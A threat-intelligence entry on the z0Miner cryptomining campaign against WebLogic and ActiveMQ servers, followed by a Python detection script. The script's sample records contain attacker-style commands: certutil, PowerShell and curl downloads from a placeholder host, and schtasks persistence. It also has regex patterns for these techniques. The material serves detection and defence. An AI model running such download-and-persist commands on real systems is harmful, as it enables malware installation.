Cloud Threat Landscape

z0Miner targeting WebLogic servers

Type: Campaign
Actors: z0miner
Pub. date: March 6, 2024
Initial access: 1-day vulnerability
Impact: Resource hijacking
Observed techniques: Vulnerability exploitation
Observed tools: XMRig, netcat, frp
Targeted technologies: WebLogic, Apache ActiveMQ
References: https://asec.ahnlab.com/en/62564/
Status: Finalized
Last edited: Jun 2, 2024 8:02 AM

Researchers observed the threat actor z0Miner targeting Korean WebLogic servers and using them as download servers for distributing malware, including miners and network tools. It is recommended to look for indicators of compromise in your environment and, if any are identified, remove the files immediately and redeploy the affected workloads from a known clean state.

On January 26, 2024, researchers discovered instances of z0Miner distributing malware to Korean WebLogic servers. The method of downloading malicious files varied depending on the operating system: powershell.exe and certutil.exe for Windows, and the curl command for Linux.

z0Miner exploited WebLogic vulnerabilities such as CVE-2020-14882 to upload JSP WebShells, including JSP File Browser, Shack2, and Behinder. The actor used FRP (fast reverse proxy), in both its default and customized builds, to tunnel Remote Desktop Protocol (RDP) traffic. Netcat was downloaded and executed to establish remote shell connections that bypass firewall restrictions. The researchers also observed a case of exploitation of an Apache ActiveMQ vulnerability (CVE-2023-46604), in which the threat actor installed Netcat and additionally installed AnyDesk.

z0Miner distributed different versions of XMRig for Windows and Linux systems, registering persistence through WMI Event Filters and Consumers or Task Scheduler (schtasks).
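The behaviours described above (LOLBin downloads via certutil.exe and powershell.exe, curl on Linux, and persistence through schtasks or WMI event subscriptions) map naturally onto a small behaviour-based triage over process-creation and WMI telemetry. The following is an added example written for this page, not code from Wiz or from the referenced report; the Sysmon-style field names and the sample records (URLs, paths, task names) are constructed assumptions, not indicators from the campaign.

```python
import re
from collections import Counter

# Constructed sample records in a Sysmon-like shape (assumed field names).
# Every URL, path and name here is made up for illustration, not a report IoC.
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": "certutil.exe -urlcache -split -f http://dl.example.invalid/a.exe C:\\Users\\Public\\a.exe"},
    {"EventID": 1, "CommandLine": "powershell.exe -nop -w hidden (New-Object Net.WebClient).DownloadFile('http://dl.example.invalid/m.exe','C:\\Users\\Public\\m.exe')"},
    {"EventID": 1, "CommandLine": "schtasks /create /sc minute /mo 15 /tn \"SystemUpdate\" /tr C:\\Users\\Public\\m.exe"},
    {"EventID": 19, "Name": "SystemUpdateFilter", "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 21, "Name": "SystemUpdateBinding", "Consumer": "CommandLineEventConsumer.Name=\"SystemUpdateConsumer\""},
    {"EventID": 1, "CommandLine": "curl -o /tmp/.x http://dl.example.invalid/x && chmod +x /tmp/.x"},
    {"EventID": 1, "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
]

# Command-line rules for the downloader and persistence techniques the report describes.
COMMANDLINE_RULES = {
    "lolbin_download": re.compile(r"\b(certutil(\.exe)?\s.*-urlcache|powershell(\.exe)?\s.*(downloadfile|downloadstring|invoke-webrequest|iwr\b))", re.I),
    "curl_to_tmp": re.compile(r"\bcurl\b.*\s-o\s+(/tmp|/dev/shm|/var/tmp)/", re.I),
    "schtasks_create": re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I),
}
# Sysmon WMI subscription events: 19 = EventFilter, 20 = EventConsumer, 21 = FilterToConsumerBinding.
WMI_EVENT_TAGS = {19: "wmi_event_filter", 20: "wmi_event_consumer", 21: "wmi_filter_binding"}


def classify(event):
    """Return the list of rule names an event triggers (empty for benign records)."""
    tags = []
    if event.get("EventID") in WMI_EVENT_TAGS:
        tags.append(WMI_EVENT_TAGS[event["EventID"]])
    cmd = event.get("CommandLine", "")
    tags.extend(name for name, pat in COMMANDLINE_RULES.items() if pat.search(cmd))
    return tags


def triage(events):
    """Count hits per rule and flag the download-then-persist chain seen in this campaign."""
    counts = Counter()
    for ev in events:
        counts.update(classify(ev))
    downloaded = bool(counts["lolbin_download"] or counts["curl_to_tmp"])
    persisted = bool(counts["schtasks_create"] or counts["wmi_filter_binding"])
    return {"hits": dict(counts), "download_and_persistence": downloaded and persisted}


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

A hit on a single rule is a lead, not a verdict; the combined flag is what raises priority, and any match should be followed by the file removal and clean redeployment recommended above.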


Last Updated: April 3, 2025